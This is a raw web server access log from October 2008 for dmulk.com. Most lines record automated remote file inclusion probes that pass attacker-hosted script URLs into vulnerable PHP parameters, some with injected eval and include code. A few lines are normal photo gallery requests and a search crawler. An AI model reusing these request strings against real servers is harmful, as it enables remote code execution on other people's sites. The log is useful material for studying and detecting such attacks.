98.136.50.138 - - [26/Oct/2008:10:18:11 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:18:17 -0700] "GET /logs/access_080927.log%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:18:20 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:18:20 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:18:20 -0700] "GET /logs/access_080615.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:18:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-061_0.jpg HTTP/1.1" 200 509282 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:18:33 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.79.163.110 - - [26/Oct/2008:10:18:48 -0700] "GET /logs/phphtml.php?htmlclass_path=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.110 - - [26/Oct/2008:10:18:48 -0700] "GET /phphtml.php?htmlclass_path=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:19:17 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:19:17 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-128.jpg HTTP/1.1" 200 544180 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:19:18 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:19:18 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.38.231 - - [26/Oct/2008:10:19:19 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.231 - - [26/Oct/2008:10:19:20 -0700] "GET /skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:19:20 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:19:28 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.231 - - [26/Oct/2008:10:19:28 -0700] "GET /skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:19:29 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
99.162.124.241 - - [26/Oct/2008:10:19:34 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.162.124.241 - - [26/Oct/2008:10:19:37 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.38.231 - - [26/Oct/2008:10:20:01 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.38.38.231 - - [26/Oct/2008:10:20:01 -0700] "GET /skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.148.160.16 - - [26/Oct/2008:10:20:02 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.148.160.16 - - [26/Oct/2008:10:20:02 -0700] "GET /skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
205.234.98.254 - - [26/Oct/2008:10:20:03 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
205.234.98.254 - - [26/Oct/2008:10:20:03 -0700] "GET /skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:20:08 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.79.163.110 - - [26/Oct/2008:10:20:13 -0700] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.110 - - [26/Oct/2008:10:20:14 -0700] "GET /logs//?path%5Bdocroot%5D=http://mobart.ee/modules/readmes? HTTP/1.1" 200 70881 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.110 - - [26/Oct/2008:10:20:27 -0700] "GET /logs/access_080710.log//?path%5Bdocroot%5D=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:20:28 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:20:28 -0700] "GET /skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:20:33 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/026-2.jpg HTTP/1.1" 200 515062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:20:44 -0700] "GET /logs/access_080928.log//common/db.php?commonpath=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:20:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-133_0.jpg HTTP/1.1" 200 364797 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:20:49 -0700] "GET /index.php?option=com_puarcade&Itemid=&gid=&mosConfig_absolute_path=http://www.itpro-ua.com/dotproject//images/.bash/id.txt? HTTP/1.1" 200 95417 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.143.7 - - [26/Oct/2008:10:20:50 -0700] "GET /logs/access_071222.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.itpro-ua.com/dotproject//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:20:50 -0700] "GET /components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.itpro-ua.com/dotproject//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:20:50 -0700] "GET /logs//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.itpro-ua.com/dotproject//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:20:57 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:20:57 -0700] "GET /skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:20:57 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:21:01 -0700] "GET /logs/access_080823.log/includes/useragent.inc.php?prefix=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:21:01 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:21:03 -0700] "GET /index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 200 94991 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:21:04 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:21:12 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:21:12 -0700] "GET /skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:21:12 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:21:18 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.187 - - [26/Oct/2008:10:21:20 -0700] "GET /logs/access_080908.log HTTP/1.0" 200 3933556 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:21:33 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.102.38 - - [26/Oct/2008:10:21:38 -0700] "GET /logs/access_080806.log//index.php?option=com_akocomment&task=quote&id=&Itemid=&mosConfig_absolute_path=http://www.itpro-ua.com/dotproject//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [26/Oct/2008:10:21:39 -0700] "GET /index.php?option=com_akocomment&task=quote&id=&Itemid=&mosConfig_absolute_path=http://www.itpro-ua.com/dotproject//images/.bash/in.txt? HTTP/1.1" 200 95530 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [26/Oct/2008:10:21:43 -0700] "GET /logs//index.php?option=com_akocomment&task=quote&id=&Itemid=&mosConfig_absolute_path=http://www.itpro-ua.com/dotproject//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:21:43 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-128_1.jpg HTTP/1.1" 200 369394 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:21:50 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/045-2.jpg HTTP/1.1" 200 302093 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:22:01 -0700] "GET /logs/access_080730.log///vwar/backup/errors.php?error=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:22:01 -0700] "GET /logs///vwar/backup/errors.php?error=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.98.254 - - [26/Oct/2008:10:22:05 -0700] "GET /logs/access_080425.log/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:10:22:06 -0700] "GET /logs/home.php?pagina=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:10:22:06 -0700] "GET /home.php?pagina=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:22:07 -0700] "GET /logs/access_080627.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:22:07 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:22:08 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:22:10 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-042_3.jpg HTTP/1.1" 200 344459 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:22:12 -0700] "GET /logs/access_080425.log/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:10:22:13 -0700] "GET /logs/access_080925.log//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://aa-acu.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:22:20 -0700] "GET /logs/access_080927.log//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://aa-acu.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.92.87.42 - - [26/Oct/2008:10:22:22 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.92.87.42 - - [26/Oct/2008:10:22:22 -0700] "GET /logs/access_080606.log//common/db.php?commonpath=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:22:22 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:22:22 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:22:22 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:22:22 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:22:25 -0700] "GET /logs/access_080519.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:10:22:25 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:10:22:25 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.148.160.16 - - [26/Oct/2008:10:22:51 -0700] "GET /logs/access_080425.log/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:23:05 -0700] "GET /logs/access_080425.log/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:23:12 -0700] "GET /skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:23:15 -0700] "GET /skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:23:28 -0700] "GET /logs/access_080827.log///vwar/backup/errors.php?error=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:23:43 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-019_2.jpg HTTP/1.1" 200 427285 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
85.92.87.42 - - [26/Oct/2008:10:24:20 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:24:20 -0700] "GET /logs/access_080606.log//common/db.php?commonpath=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:10:24:48 -0700] "GET /logs/access_080314.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:24:49 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-196.jpg HTTP/1.1" 200 291829 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:24:53 -0700] "GET /logs/access_080629.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:25:11 -0700] "GET /logs/access_080908.log%20/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.47 - - [26/Oct/2008:10:25:24 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
64.185.237.47 - - [26/Oct/2008:10:25:24 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
64.185.237.47 - - [26/Oct/2008:10:25:24 -0700] "GET /logs/access_080301.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
64.185.237.47 - - [26/Oct/2008:10:25:25 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
64.185.237.47 - - [26/Oct/2008:10:25:25 -0700] "GET /logs/access_080301.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
64.185.237.47 - - [26/Oct/2008:10:25:25 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
78.110.52.227 - - [26/Oct/2008:10:25:27 -0700] "GET /logs/access_080320.log//?database=none&cabsolute_path=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.110.52.227 - - [26/Oct/2008:10:25:27 -0700] "GET /logs//?database=none&cabsolute_path=http://www.helpvenice.com/id.txt??? HTTP/1.1" 200 70881 "-" "libwww-perl/5.803" "www.dmulk.com"
78.110.52.227 - - [26/Oct/2008:10:25:28 -0700] "GET /?database=none&cabsolute_path=http://www.helpvenice.com/id.txt??? HTTP/1.1" 200 94948 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.143.7 - - [26/Oct/2008:10:25:31 -0700] "GET /components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.itpro-ua.com/dotproject//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.110.52.227 - - [26/Oct/2008:10:25:33 -0700] "GET /logs/access_080609.log//?database=none&cabsolute_path=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:10:25:34 -0700] "GET /logs/access_071228.log/index.php?sub=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:25:35 -0700] "GET /index.php?sub=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 200 94955 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:10:25:36 -0700] "GET /logs/index.php?sub=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:25:48 -0700] "GET /logs/access_080802.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.10 - - [26/Oct/2008:10:25:48 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.10 - - [26/Oct/2008:10:25:49 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:26:00 -0700] "GET /logs//index.php?option=com_puarcade&Itemid=&gid=&mosConfig_absolute_path=http://www.itpro-ua.com/dotproject//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.48.189.45 - - [26/Oct/2008:10:26:02 -0700] "GET /index.php?option=com_puarcade&Itemid=&gid=&mosConfig_absolute_path=http://www.itpro-ua.com/dotproject//images/.bash/id.txt? HTTP/1.1" 200 95385 "-" "libwww-perl/5.79" "www.dmulk.com"
83.102.137.163 - - [26/Oct/2008:10:26:03 -0700] "GET /logs/access_080802.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
